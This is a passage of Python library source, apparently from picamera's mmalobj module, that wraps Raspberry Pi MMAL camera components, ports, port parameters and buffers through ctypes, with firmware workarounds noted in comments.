rows[2].append('%dx%d' % (obj._port[0].buffer_num, obj._port[0].buffer_size))
if under_comp:
rows[3].append('bitrate')
rows[3].append('%dbps' % (obj._port[0].format[0].bitrate,))
if under_comp:
rows[4].append('frame')
rows[4].append('%dx%d@%sfps' % (
obj._port[0].format[0].es[0].video.width,
obj._port[0].format[0].es[0].video.height,
obj.framerate))
if under_comp:
rows[5].append('colorspc')
under_comp = False
rows[5].append(mmal.FOURCC_str(obj._port[0].format[0].es[0].video.color_space))
elif isinstance(obj, MMALPythonPort):
rows[0].append('[%d]' % obj._index)
if under_comp:
rows[1].append('encoding')
if obj.format == mmal.MMAL_ENCODING_OPAQUE:
rows[1].append(obj.opaque_subformat)
else:
rows[1].append(mmal.FOURCC_str(obj._format[0].encoding))
if under_comp:
rows[2].append('buf')
rows[2].append('%dx%d' % (obj.buffer_count, obj.buffer_size))
if under_comp:
rows[3].append('bitrate')
rows[3].append('%dbps' % (obj._format[0].bitrate,))
if under_comp:
rows[4].append('frame')
under_comp = False
rows[4].append('%dx%d@%sfps' % (
obj._format[0].es[0].video.width,
obj._format[0].es[0].video.height,
obj.framerate))
if under_comp:
rows[5].append('colorspc')
rows[5].append('???')
elif isinstance(obj, (MMALConnection, MMALPythonConnection)):
rows[0].append('')
rows[1].append('')
rows[2].append('-->')
rows[3].append('')
rows[4].append('')
rows[5].append('')
if under_comp:
rows[1].append('encoding')
rows[2].append('buf')
rows[3].append('bitrate')
rows[4].append('frame')
rows[5].append('colorspc')
cols = list(zip(*rows))
max_lens = [max(len(s) for s in col) + 2 for col in cols]
rows = [
''.join('{0:{align}{width}s}'.format(s, align=align, width=max_len)
for s, max_len, align in zip(row, max_lens, cycle('^<^>')))
for row in rows
]
for row in rows:
print(row)
class MMALObject(object):
"""
Represents an object wrapper around an MMAL object (component, port,
connection, etc). This base class maintains a registry of all MMAL objects
currently alive (via weakrefs) which permits object lookup by name and
listing all used MMAL objects.
"""
__slots__ = ('__weakref__',)
REGISTRY = weakref.WeakSet()
def __init__(self):
super(MMALObject, self).__init__()
MMALObject.REGISTRY.add(self)
class MMALBaseComponent(MMALObject):
"""
Represents a generic MMAL component. Class attributes are read to determine
the component type, and the OPAQUE sub-formats of each connectable port.
"""
__slots__ = ('_component', '_control', '_inputs', '_outputs')
component_type = b'none'
opaque_input_subformats = ()
opaque_output_subformats = ()
def __init__(self):
super(MMALBaseComponent, self).__init__()
self._component = ct.POINTER(mmal.MMAL_COMPONENT_T)()
mmal_check(
mmal.mmal_component_create(self.component_type, self._component),
prefix="Failed to create MMAL component %s" % self.component_type)
if self._component[0].input_num != len(self.opaque_input_subformats):
raise PiCameraRuntimeError(
'Expected %d inputs but found %d on component %s' % (
len(self.opaque_input_subformats),
self._component[0].input_num,
self.component_type))
if self._component[0].output_num != len(self.opaque_output_subformats):
raise PiCameraRuntimeError(
'Expected %d outputs but found %d on component %s' % (
len(self.opaque_output_subformats),
self._component[0].output_num,
self.component_type))
self._control = MMALControlPort(self._component[0].control)
port_class = {
mmal.MMAL_ES_TYPE_UNKNOWN: MMALPort,
mmal.MMAL_ES_TYPE_CONTROL: MMALControlPort,
mmal.MMAL_ES_TYPE_VIDEO: MMALVideoPort,
mmal.MMAL_ES_TYPE_AUDIO: MMALAudioPort,
mmal.MMAL_ES_TYPE_SUBPICTURE: MMALSubPicturePort,
}
self._inputs = tuple(
port_class[self._component[0].input[n][0].format[0].type](
self._component[0].input[n], opaque_subformat)
for n, opaque_subformat in enumerate(self.opaque_input_subformats))
self._outputs = tuple(
port_class[self._component[0].output[n][0].format[0].type](
self._component[0].output[n], opaque_subformat)
for n, opaque_subformat in enumerate(self.opaque_output_subformats))
def close(self):
"""
Close the component and release all its resources. After this is
called, most methods will raise exceptions if called.
"""
if self._component is not None:
# ensure we free any pools associated with input/output ports
for output in self.outputs:
output.disable()
for input in self.inputs:
input.disable()
mmal.mmal_component_destroy(self._component)
self._component = None
self._inputs = ()
self._outputs = ()
self._control = None
@property
def name(self):
return self._component[0].name.decode('ascii')
@property
def control(self):
"""
The :class:`MMALControlPort` control port of the component which can be
used to configure most aspects of the component's behaviour.
"""
return self._control
@property
def inputs(self):
"""
A sequence of :class:`MMALPort` objects representing the inputs
of the component.
"""
return self._inputs
@property
def outputs(self):
"""
A sequence of :class:`MMALPort` objects representing the outputs
of the component.
"""
return self._outputs
@property
def enabled(self):
"""
Returns ``True`` if the component is currently enabled. Use
:meth:`enable` and :meth:`disable` to control the component's state.
"""
return bool(self._component[0].is_enabled)
def enable(self):
"""
Enable the component. When a component is enabled it will process data
sent to its input port(s), sending the results to buffers on its output
port(s). Components may be implicitly enabled by connections.
"""
mmal_check(
mmal.mmal_component_enable(self._component),
prefix="Failed to enable component")
def disable(self):
"""
Disables the component.
"""
mmal_check(
mmal.mmal_component_disable(self._component),
prefix="Failed to disable component")
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.close()
def __repr__(self):
if self._component is not None:
return '<%s "%s": %d inputs %d outputs>' % (
self.__class__.__name__, self.name,
len(self.inputs), len(self.outputs))
else:
return '<%s closed>' % self.__class__.__name__
class MMALControlPort(MMALObject):
"""
Represents an MMAL port with properties to configure the port's parameters.
"""
__slots__ = ('_port', '_params', '_wrapper')
def __init__(self, port):
super(MMALControlPort, self).__init__()
self._port = port
self._params = MMALPortParams(port)
self._wrapper = None
@property
def index(self):
"""
Returns an integer indicating the port's position within its owning
list (inputs, outputs, etc.)
"""
return self._port[0].index
@property
def enabled(self):
"""
Returns a :class:`bool` indicating whether the port is currently
enabled. Unlike other classes, this is a read-only property. Use
:meth:`enable` and :meth:`disable` to modify the value.
"""
return bool(self._port[0].is_enabled)
def enable(self, callback=None):
"""
Enable the port with the specified callback function (this must be
``None`` for connected ports, and a callable for disconnected ports).
The callback function must accept two parameters which will be this
:class:`MMALControlPort` (or descendent) and an :class:`MMALBuffer`
instance. Any return value will be ignored.
"""
def wrapper(port, buf):
buf = MMALBuffer(buf)
try:
callback(self, buf)
finally:
buf.release()
if callback:
self._wrapper = mmal.MMAL_PORT_BH_CB_T(wrapper)
else:
self._wrapper = ct.cast(None, mmal.MMAL_PORT_BH_CB_T)
mmal_check(
mmal.mmal_port_enable(self._port, self._wrapper),
prefix="Unable to enable port %s" % self.name)
def disable(self):
"""
Disable the port.
"""
# NOTE: The test here only exists to avoid spamming the console; when
# disabling an already disabled port MMAL dumps errors to stderr. If
# this test isn't here closing a camera results in half a dozen lines
# of ignored errors
if self.enabled:
try:
mmal_check(
mmal.mmal_port_disable(self._port),
prefix="Unable to disable port %s" % self.name)
except PiCameraMMALError as e:
# Ignore the error if we're disabling an already disabled port
if not (e.status == mmal.MMAL_EINVAL and not self.enabled):
raise e
self._wrapper = None
@property
def name(self):
result = self._port[0].name.decode('ascii')
if result.endswith(')'):
try:
# strip (format) from port names as it doesn't really belong
# there (it doesn't identify the port in any way) and makes
# matching some of the correctional cases a pain
return result[:result.rindex('(')]
except ValueError:
return result
else:
return result
@property
def type(self):
"""
The type of the port. One of:
* MMAL_PORT_TYPE_OUTPUT
* MMAL_PORT_TYPE_INPUT
* MMAL_PORT_TYPE_CONTROL
* MMAL_PORT_TYPE_CLOCK
"""
return self._port[0].type
@property
def capabilities(self):
"""
The capabilities of the port. A bitfield of the following:
* MMAL_PORT_CAPABILITY_PASSTHROUGH
* MMAL_PORT_CAPABILITY_ALLOCATION
* MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE
"""
return self._port[0].capabilities
@property
def params(self):
"""
The configurable parameters for the port. This is presented as a
mutable mapping of parameter numbers to values, implemented by the
:class:`MMALPortParams` class.
"""
return self._params
def __repr__(self):
if self._port is not None:
return '<MMALControlPort "%s">' % self.name
else:
return '<MMALControlPort closed>'
class MMALPort(MMALControlPort):
"""
Represents an MMAL port with properties to configure and update the port's
format. This is the base class of :class:`MMALVideoPort`,
:class:`MMALAudioPort`, and :class:`MMALSubPicturePort`.
"""
__slots__ = ('_opaque_subformat', '_pool', '_stopped', '_connection')
# A mapping of corrected definitions of supported_formats for ports with
# particular names. Older firmwares either raised EINVAL, ENOSYS, or just
# reported the wrong things for various ports; these lists are derived from
# querying newer firmwares or in some cases guessing sensible defaults
# (for ports where even the newer firmwares get stuff wrong).
_supported_formats_patch = {
'vc.ril.camera:out:2': [
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
mmal.MMAL_ENCODING_UYVY,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_YV12,
mmal.MMAL_ENCODING_NV21,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_RGBA,
],
'vc.ril.image_encode:in:0': [
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
],
'vc.ril.image_encode:out:0': [
mmal.MMAL_ENCODING_JPEG,
mmal.MMAL_ENCODING_GIF,
mmal.MMAL_ENCODING_PNG,
mmal.MMAL_ENCODING_BMP,
mmal.MMAL_ENCODING_PPM,
mmal.MMAL_ENCODING_TGA,
],
'vc.ril.resize:in:0': [
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_I420,
# several invalid encodings (lowercase versions of the priors)
# appear here in modern firmwares but since they don't map to any
# constants they're excluded
mmal.MMAL_ENCODING_I420_SLICE,
],
'vc.ril.resize:out:0': [
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_I420,
# same invalid encodings as above here
mmal.MMAL_ENCODING_I420_SLICE,
],
'vc.ril.isp:in:0': [
mmal.MMAL_ENCODING_BAYER_SBGGR8,
mmal.MMAL_ENCODING_BAYER_SBGGR10DPCM8,
mmal.MMAL_ENCODING_BAYER_SBGGR10P,
mmal.MMAL_ENCODING_BAYER_SBGGR12P,
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
mmal.MMAL_ENCODING_UYVY,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_YV12,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_YUVUV128,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_NV21,
],
'vc.ril.isp:out:0': [
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
mmal.MMAL_ENCODING_UYVY,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_YV12,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_YUVUV128,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_NV21,
],
'vc.null_sink:in:0': [
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
],
}
def __init__(self, port, opaque_subformat='OPQV'):
super(MMALPort, self).__init__(port)
self.opaque_subformat = opaque_subformat
self._pool = None
self._stopped = True
self._connection = None
def __repr__(self):
if self._port is not None:
return '<MMALPort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d>' % (
self.name, mmal.FOURCC_str(self.format),
self.buffer_count, self.buffer_size)
else:
return '<MMALPort closed>'
def _get_opaque_subformat(self):
return self._opaque_subformat
def _set_opaque_subformat(self, value):
self._opaque_subformat = value
opaque_subformat = property(
_get_opaque_subformat, _set_opaque_subformat, doc="""\
Retrieves or sets the opaque sub-format that the port speaks. While
most formats (I420, RGBA, etc.) mean one thing, the opaque format is
special; different ports produce different sorts of data when
configured for OPQV format. This property stores a string which
uniquely identifies what the associated port means for OPQV format.
If the port does not support opaque format at all, set this property to
``None``.
:class:`MMALConnection` uses this information when negotiating formats
for a connection between two ports.
""")
def _get_format(self):
result = self._port[0].format[0].encoding
if FIX_RGB_BGR_ORDER:
return {
mmal.MMAL_ENCODING_RGB24: mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_BGR24: mmal.MMAL_ENCODING_RGB24,
}.get(result, result)
else:
return result
def _set_format(self, value):
if FIX_RGB_BGR_ORDER:
value = {
mmal.MMAL_ENCODING_RGB24: mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_BGR24: mmal.MMAL_ENCODING_RGB24,
}.get(value, value)
self._port[0].format[0].encoding = value
if value == mmal.MMAL_ENCODING_OPAQUE:
self._port[0].format[0].encoding_variant = mmal.MMAL_ENCODING_I420
format = property(_get_format, _set_format, doc="""\
Retrieves or sets the encoding format of the port. Setting this
attribute implicitly sets the encoding variant to a sensible value
(I420 in the case of OPAQUE).
After setting this attribute, call :meth:`commit` to make the changes
effective.
""")
@property
def supported_formats(self):
"""
Retrieves a sequence of supported encodings on this port.
"""
try:
mp = self.params[mmal.MMAL_PARAMETER_SUPPORTED_ENCODINGS]
except PiCameraMMALError as e:
if e.status in (mmal.MMAL_EINVAL, mmal.MMAL_ENOSYS):
# Workaround: old firmwares raise EINVAL or ENOSYS when various
# ports are queried for supported formats. The following is the
# correct sequence for old firmwares (note: swapped RGB24 and
# BGR24 order in still port) ... probably (vc.ril.camera:out:2
# is definitely right, the rest are largely guessed based on
# queries of later firmwares)
try:
return MMALPort._supported_formats_patch[self.name]
except KeyError:
raise e
else:
raise
else:
result = [
v for v in mp.encoding if v != 0
][:mp.hdr.size // ct.sizeof(ct.c_uint32)]
# Workaround: Fix incorrect result on MMALImageEncoder.outputs[0]
# from modern firmwares
if self.name == 'vc.ril.image_encode:out:0' and result == [
mmal.MMAL_ENCODING_MP2V, mmal.MMAL_ENCODING_MP2V,
mmal.MMAL_ENCODING_H264, mmal.MMAL_ENCODING_H264,
mmal.MMAL_ENCODING_VP7, mmal.MMAL_ENCODING_VP7,
mmal.MMAL_ENCODING_VP6, mmal.MMAL_ENCODING_VP6]:
return MMALPort._supported_formats_patch[self.name]
else:
return result
def _get_bitrate(self):
return self._port[0].format[0].bitrate
def _set_bitrate(self, value):
self._port[0].format[0].bitrate = value
bitrate = property(_get_bitrate, _set_bitrate, doc="""\
Retrieves or sets the bitrate limit for the port's format.
""")
def copy_from(self, source):
"""
Copies the port's :attr:`format` from the *source*
:class:`MMALControlPort`.
"""
if isinstance(source, MMALPythonPort):
mmal.mmal_format_copy(self._port[0].format, source._format)
else:
mmal.mmal_format_copy(self._port[0].format, source._port[0].format)
def commit(self):
"""
Commits the port's configuration and automatically updates the number
and size of associated buffers according to the recommendations of the
MMAL library. This is typically called after adjusting the port's
format and/or associated settings (like width and height for video
ports).
"""
mmal_check(
mmal.mmal_port_format_commit(self._port),
prefix="Format couldn't be set on port %s" % self.name)
# Workaround: Unfortunately, there is an upstream issue with the
# buffer_num_recommended which means it can't currently be used (see
# discussion in raspberrypi/userland#167). There's another upstream
# issue with buffer_num_min which means we need to guard against 0
# values...
self._port[0].buffer_num = max(1, self._port[0].buffer_num_min)
self._port[0].buffer_size = (
self._port[0].buffer_size_recommended
if self._port[0].buffer_size_recommended > 0 else
self._port[0].buffer_size_min)
@property
def pool(self):
"""
Returns the :class:`MMALPool` associated with the buffer, if any.
"""
return self._pool
def get_buffer(self, block=True, timeout=None):
"""
Returns a :class:`MMALBuffer` from the associated :attr:`pool`. *block*
and *timeout* act as they do in the corresponding
:meth:`MMALPool.get_buffer`.
"""
if not self.enabled:
raise PiCameraPortDisabled(
'cannot get buffer from disabled port %s' % self.name)
return self.pool.get_buffer(block, timeout)
def send_buffer(self, buf):
"""
Send :class:`MMALBuffer` *buf* to the port.
"""
if (
self.type == mmal.MMAL_PORT_TYPE_INPUT and
isinstance(self._connection, MMALPythonConnection) and
self._connection._callback is not None):
try:
modified_buf = self._connection._callback(self._connection, buf)
except:
buf.release()
raise
else:
if modified_buf is None:
buf.release()
return
else:
buf = modified_buf
try:
mmal_check(
mmal.mmal_port_send_buffer(self._port, buf._buf),
prefix="cannot send buffer to port %s" % self.name)
except PiCameraMMALError as e:
# If port is disabled, convert exception for convenience
if e.status == mmal.MMAL_EINVAL and not self.enabled:
raise PiCameraPortDisabled(
'cannot send buffer to disabled port %s' % self.name)
else:
raise
def flush(self):
"""
Flush the port.
"""
mmal_check(
mmal.mmal_port_flush(self._port),
prefix="Unable to flush port %s" % self.name)
def _get_buffer_count(self):
return self._port[0].buffer_num
def _set_buffer_count(self, value):
if value < 1:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer count <1')
self._port[0].buffer_num = value
buffer_count = property(_get_buffer_count, _set_buffer_count, doc="""\
The number of buffers allocated (or to be allocated) to the port.
The ``mmalobj`` layer automatically configures this based on
recommendations from the MMAL library.
""")
def _get_buffer_size(self):
return self._port[0].buffer_size
def _set_buffer_size(self, value):
if value < 0:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer size <0')
self._port[0].buffer_size = value
buffer_size = property(_get_buffer_size, _set_buffer_size, doc="""\
The size of buffers allocated (or to be allocated) to the port. The
size of buffers is typically dictated by the port's format. The
``mmalobj`` layer automatically configures this based on
recommendations from the MMAL library.
""")
def enable(self, callback=None):
"""
Enable the port with the specified callback function (this must be
``None`` for connected ports, and a callable for disconnected ports).
The callback function must accept two parameters which will be this
:class:`MMALControlPort` (or descendent) and an :class:`MMALBuffer`
instance. The callback should return ``True`` when processing is
complete and no further calls are expected (e.g. at frame-end for an
image encoder), and ``False`` otherwise.
"""
def wrapper(port, buf):
buf = MMALBuffer(buf)
try:
if not self._stopped and callback(self, buf):
self._stopped = True
finally:
buf.release()
try:
self._pool.send_buffer(block=False)
except PiCameraPortDisabled:
# The port was disabled, no point trying again
pass
# Workaround: There is a bug in the MJPEG encoder that causes a
# deadlock if the FIFO is full on shutdown. Increasing the encoder
# buffer size makes this less likely to happen. See
# raspberrypi/userland#208. Connecting the encoder component resets the
# output port's buffer size, hence why we correct this here, just
# before enabling the port.
if self._port[0].format[0].encoding == mmal.MMAL_ENCODING_MJPEG:
self._port[0].buffer_size = max(512 * 1024, self._port[0].buffer_size_recommended)
if callback:
assert self._stopped
assert self._pool is None
self._stopped = False
self._pool = MMALPortPool(self)
try:
self._wrapper = mmal.MMAL_PORT_BH_CB_T(wrapper)
mmal_check(
mmal.mmal_port_enable(self._port, self._wrapper),
prefix="Unable to enable port %s" % self.name)
# If this port is an output port, send it all the buffers
# in the pool. If it's an input port, don't bother: the user
# will presumably want to feed buffers to it manually
if self._port[0].type == mmal.MMAL_PORT_TYPE_OUTPUT:
self._pool.send_all_buffers(block=False)
except:
self._pool.close()
self._pool = None
self._stopped = True
raise
else:
super(MMALPort, self).enable()
def disable(self):
"""
Disable the port.
"""
self._stopped = True
super(MMALPort, self).disable()
if self._pool is not None:
self._pool.close()
self._pool = None
@property
def connection(self):
"""
If this port is connected to another, this property holds the
:class:`MMALConnection` or :class:`MMALPythonConnection` object which
represents that connection. If this port is not connected, this
property is ``None``.
"""
return self._connection
def connect(self, other, **options):
"""
Connect this port to the *other* :class:`MMALPort` (or
:class:`MMALPythonPort`). The type and configuration of the connection
will be automatically selected.
Various connection *options* can be specified as keyword arguments.
These will be passed onto the :class:`MMALConnection` or
:class:`MMALPythonConnection` constructor that is called (see those
classes for an explanation of the available options).
"""
# Always construct connections from the output end
if self.type != mmal.MMAL_PORT_TYPE_OUTPUT:
return other.connect(self, **options)
if other.type != mmal.MMAL_PORT_TYPE_INPUT:
raise PiCameraValueError(
'A connection can only be established between an output and '
'an input port')
if isinstance(other, MMALPythonPort):
return MMALPythonConnection(self, other, **options)
else:
return MMALConnection(self, other, **options)
def disconnect(self):
"""
Destroy the connection between this port and another port.
"""
if self.connection is not None:
self.connection.close()
class MMALVideoPort(MMALPort):
"""
Represents an MMAL port used to pass video data.
"""
__slots__ = ()
def __repr__(self):
if self._port is not None:
return (
'<MMALVideoPort "%s": format=MMAL_FOURCC("%s") buffers=%dx%d '
'frames=%s@%sfps colorspace=MMAL_FOURCC("%s")>' % (
self.name, mmal.FOURCC_str(self.format),
self._port[0].buffer_num, self._port[0].buffer_size,
self.framesize, self.framerate,
mmal.FOURCC_str(self.colorspace)))
else:
return '<MMALVideoPort closed>'
def _get_framesize(self):
return PiResolution(
self._port[0].format[0].es[0].video.crop.width,
self._port[0].format[0].es[0].video.crop.height,
)
def _set_framesize(self, value):
value = to_resolution(value)
video = self._port[0].format[0].es[0].video
video.width = bcm_host.VCOS_ALIGN_UP(value.width, 32)
video.height = bcm_host.VCOS_ALIGN_UP(value.height, 16)
video.crop.width = int(value.width)
video.crop.height = int(value.height)
framesize = property(_get_framesize, _set_framesize, doc="""\
Retrieves or sets the size of the port's video frames as a (width,
height) tuple. This attribute implicitly handles scaling the given
size up to the block size of the camera (32x16).
After setting this attribute, call :meth:`~MMALPort.commit` to make the
changes effective.
""")
def _get_framerate(self):
video = self._port[0].format[0].es[0].video
try:
return Fraction(
video.frame_rate.num,
video.frame_rate.den)
except ZeroDivisionError:
assert video.frame_rate.num == 0
return Fraction(0, 1)
def _set_framerate(self, value):
value = to_fraction(value)
video = self._port[0].format[0].es[0].video
video.frame_rate.num = value.numerator
video.frame_rate.den = value.denominator
framerate = property(_get_framerate, _set_framerate, doc="""\
Retrieves or sets the framerate of the port's video frames in fps.
After setting this attribute, call :meth:`~MMALPort.commit` to make the
changes effective.
""")
def _get_colorspace(self):
return self._port[0].format[0].es[0].video.color_space
def _set_colorspace(self, value):
self._port[0].format[0].es[0].video.color_space = value
colorspace = property(_get_colorspace, _set_colorspace, doc="""\
Retrieves or sets the color-space of the port's frames.
After setting this attribute, call :meth:`~MMALPort.commit` to make the
changes effective.
""")
class MMALAudioPort(MMALPort):
"""
Represents an MMAL port used to pass audio data.
"""
__slots__ = ()
def __repr__(self):
if self._port is not None:
return '<MMALAudioPort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d>' % (
self.name, mmal.FOURCC_str(self.format),
self._port[0].buffer_num, self._port[0].buffer_size)
else:
return '<MMALAudioPort closed>'
class MMALSubPicturePort(MMALPort):
"""
Represents an MMAL port used to pass sub-picture (caption) data.
"""
__slots__ = ()
def __repr__(self):
if self._port is not None:
return '<MMALSubPicturePort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d>' % (
self.name, mmal.FOURCC_str(self.format),
self._port[0].buffer_num, self._port[0].buffer_size)
else:
return '<MMALSubPicturePort closed>'
class MMALPortParams(object):
"""
Represents the parameters of an MMAL port. This class implements the
:attr:`MMALControlPort.params` attribute.
Internally, the class understands how to convert certain structures to more
common Python data-types. For example, parameters that expect an
MMAL_RATIONAL_T type will return and accept Python's
:class:`~fractions.Fraction` class (or any other numeric types), while
parameters that expect an MMAL_BOOL_T type will treat anything as a truthy
value. Parameters that expect the MMAL_PARAMETER_STRING_T structure will be
treated as plain strings, and likewise MMAL_PARAMETER_INT32_T and similar
structures will be treated as plain ints.
Parameters that expect more complex structures will return and expect
those structures verbatim.
"""
__slots__ = ('_port',)
def __init__(self, port):
super(MMALPortParams, self).__init__()
self._port = port
def __getitem__(self, key):
dtype = PARAM_TYPES[key]
# Use the short-cut functions where possible (teeny bit faster if we
# get some C to do the structure wrapping for us)
func = {
mmal.MMAL_PARAMETER_RATIONAL_T: mmal.mmal_port_parameter_get_rational,
mmal.MMAL_PARAMETER_BOOLEAN_T: mmal.mmal_port_parameter_get_boolean,
mmal.MMAL_PARAMETER_INT32_T: mmal.mmal_port_parameter_get_int32,
mmal.MMAL_PARAMETER_INT64_T: mmal.mmal_port_parameter_get_int64,
mmal.MMAL_PARAMETER_UINT32_T: mmal.mmal_port_parameter_get_uint32,
mmal.MMAL_PARAMETER_UINT64_T: mmal.mmal_port_parameter_get_uint64,
}.get(dtype, mmal.mmal_port_parameter_get)
conv = {
mmal.MMAL_PARAMETER_RATIONAL_T: lambda v: Fraction(v.num, v.den),
mmal.MMAL_PARAMETER_BOOLEAN_T: lambda v: v.value != mmal.MMAL_FALSE,
mmal.MMAL_PARAMETER_INT32_T: lambda v: v.value,
mmal.MMAL_PARAMETER_INT64_T: lambda v: v.value,
mmal.MMAL_PARAMETER_UINT32_T: lambda v: v.value,
mmal.MMAL_PARAMETER_UINT64_T: lambda v: v.value,
mmal.MMAL_PARAMETER_STRING_T: lambda v: v.str.decode('ascii'),
}.get(dtype, lambda v: v)
if func == mmal.mmal_port_parameter_get:
result = dtype(
mmal.MMAL_PARAMETER_HEADER_T(key, ct.sizeof(dtype))
)
mmal_check(
func(self._port, result.hdr),
prefix="Failed to get parameter %d" % key)
else:
dtype = {
mmal.MMAL_PARAMETER_RATIONAL_T: mmal.MMAL_RATIONAL_T,
mmal.MMAL_PARAMETER_BOOLEAN_T: mmal.MMAL_BOOL_T,
mmal.MMAL_PARAMETER_INT32_T: ct.c_int32,
mmal.MMAL_PARAMETER_INT64_T: ct.c_int64,
mmal.MMAL_PARAMETER_UINT32_T: ct.c_uint32,
mmal.MMAL_PARAMETER_UINT64_T: ct.c_uint64,
}[dtype]
result = dtype()
mmal_check(
func(self._port, key, result),
prefix="Failed to get parameter %d" % key)
return conv(result)
def __setitem__(self, key, value):
dtype = PARAM_TYPES[key]
func = {
mmal.MMAL_PARAMETER_RATIONAL_T: mmal.mmal_port_parameter_set_rational,
mmal.MMAL_PARAMETER_BOOLEAN_T: mmal.mmal_port_parameter_set_boolean,
mmal.MMAL_PARAMETER_INT32_T: mmal.mmal_port_parameter_set_int32,
mmal.MMAL_PARAMETER_INT64_T: mmal.mmal_port_parameter_set_int64,
mmal.MMAL_PARAMETER_UINT32_T: mmal.mmal_port_parameter_set_uint32,
mmal.MMAL_PARAMETER_UINT64_T: mmal.mmal_port_parameter_set_uint64,
mmal.MMAL_PARAMETER_STRING_T: mmal.mmal_port_parameter_set_string,
}.get(dtype, mmal.mmal_port_parameter_set)
conv = {
mmal.MMAL_PARAMETER_RATIONAL_T: lambda v: to_rational(v),
mmal.MMAL_PARAMETER_BOOLEAN_T: lambda v: mmal.MMAL_TRUE if v else mmal.MMAL_FALSE,
mmal.MMAL_PARAMETER_STRING_T: lambda v: v.encode('ascii'),
}.get(dtype, lambda v: v)
if func == mmal.mmal_port_parameter_set:
mp = conv(value)
assert mp.hdr.id == key
assert mp.hdr.size >= ct.sizeof(dtype)
mmal_check(
func(self._port, mp.hdr),
prefix="Failed to set parameter %d to %r" % (key, value))
else:
mmal_check(
func(self._port, key, conv(value)),
prefix="Failed to set parameter %d to %r" % (key, value))
class MMALBuffer(object):
"""
Represents an MMAL buffer header. This is usually constructed from the
buffer header pointer and is largely supplied to make working with
the buffer's data a bit simpler. Using the buffer as a context manager
implicitly locks the buffer's memory and returns the :mod:`ctypes`
buffer object itself::
def callback(port, buf):
with buf as data:
# data is a ctypes uint8 array with size entries
print(len(data))
Alternatively you can use the :attr:`data` property directly, which returns
and modifies the buffer's data as a :class:`bytes` object (note this is
generally slower than using the buffer object unless you are simply
replacing the entire buffer)::
def callback(port, buf):
# the buffer contents as a byte-string
print(buf.data)
"""
__slots__ = ('_buf',)
def __init__(self, buf):
super(MMALBuffer, self).__init__()
self._buf = buf
def _get_command(self):
return self._buf[0].cmd
def _set_command(self, value):
self._buf[0].cmd = value
command = property(_get_command, _set_command, doc="""\
The command set in the buffer's meta-data. This is usually 0 for
buffers returned by an encoder; typically this is only used by buffers
sent to the callback of a control port.
""")
def _get_flags(self):
return self._buf[0].flags
def _set_flags(self, value):
self._buf[0].flags = value
flags = property(_get_flags, _set_flags, doc="""\
The flags set in the buffer's meta-data, returned as a bitmapped
integer. Typical flags include:
* ``MMAL_BUFFER_HEADER_FLAG_EOS`` -- end of stream
* ``MMAL_BUFFER_HEADER_FLAG_FRAME_START`` -- start of frame data
* ``MMAL_BUFFER_HEADER_FLAG_FRAME_END`` -- end of frame data
* ``MMAL_BUFFER_HEADER_FLAG_KEYFRAME`` -- frame is a key-frame
* ``MMAL_BUFFER_HEADER_FLAG_FRAME`` -- frame data
* ``MMAL_BUFFER_HEADER_FLAG_CODECSIDEINFO`` -- motion estimatation data
""")
def _get_pts(self):
return self._buf[0].pts
def _set_pts(self, value):
self._buf[0].pts = value
pts = property(_get_pts, _set_pts, doc="""\
The presentation timestamp (PTS) of the buffer, as an integer number
of microseconds or ``MMAL_TIME_UNKNOWN``.
""")
def _get_dts(self):
return self._buf[0].dts
def _set_dts(self, value):
self._buf[0].dts = value
dts = property(_get_dts, _set_dts, doc="""\
The decoding timestamp (DTS) of the buffer, as an integer number of
microseconds or ``MMAL_TIME_UNKNOWN``.
""")
@property
def size(self):
"""
Returns the length of the buffer's data area in bytes. This will be
greater than or equal to :attr:`length` and is fixed in value.
"""
return self._buf[0].alloc_size
